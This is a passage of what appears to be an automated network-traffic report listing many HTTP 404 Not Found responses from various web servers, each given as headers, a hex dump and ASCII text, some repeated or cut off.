    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:28:25 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:28:24 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:28:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GlassFish Server Open Source Edition 5.0 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 5.0 Java/Oracle Corporation/1.8)Content-Language: Content-Type: text/htmlContent-Length: 1082Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6c 61 73 73 46 69 73 68 20 53 65 72 76 65 72 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 45 64 69 74 69 6f 6e 20 20 35 2e 30 20 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 2f 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:28:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:28:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 14Content-Type: text/plainData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:28:33 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:28:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:23:13 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 14 Feb 2024 08:28:36 GMTContent-Length: 23Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mxhttpd/2.19-MX Apr 21 2021Content-type: text/htmlDate: Wed, 14 Feb 2024 08:28:39 GMTLast-modified: Wed, 14 Feb 2024 08:28:39 GMTAccept-Ranges: bytesConnection: closeContent-length: 7567X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 39 27 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 70 75 62 6c 69 73 68 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 63 6f 70 79 72 69 67 68 74 27 20 63 6f 6e 74 65 6e 74 3d 27 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 27 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 61 75 74 68 6f 72 27 20 63 6f 6e 74 65 6e 74 3d 27 44 61 6e 69 65 6c 20 4b 61 62 73 2c 20 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 6f 77 6e 65 72 27 20 68 72 65 66 3d 27 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 6d 6f 62 6f 74 69 78 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 63 6f 70 79 72 69 67 68 74 27 20 68 72 65 66 3d 27 2f 61 62 6f 75 74 2e 68 74 6d 6c 27 20 74 69 74 6c 65 3d 27 43 6f 70 79 72 69 67 68 74 27 20 2f 3e 0a 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 3b 0a 7d 0a 2e 76 65 6e 64 6f 72 69 63 6f 6e 20 7b 0a 09 68 65 69 67 68 74 3a 31 38 70 78 3b 0a 7d 0a 70 72 65 2c 0a 74 65 78 74 61 72 65 61 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 3b 0a 7d 0a 2e 68 65 61 64 74 61 62 6c 65 73 6d 61 6c 6c 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 34 34 39 34 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 35 25 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 0a 09 70 61 64 64 69 6e 67 3a 34 70 78 3b 0a 7d 0a 2e 68 65 61 64 74 61 62 6c 65 73 6d 61 6c 6c 20 69 6d 67 20 7b 0a 09 62 6f 72 64
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:28:40 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:28:27 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Wed, 14 Feb 2024 08:28:46 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:28:47 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Wed, 14 Feb 2024 11:28:54 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Wed, 14 Feb 2024 08:28:57 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 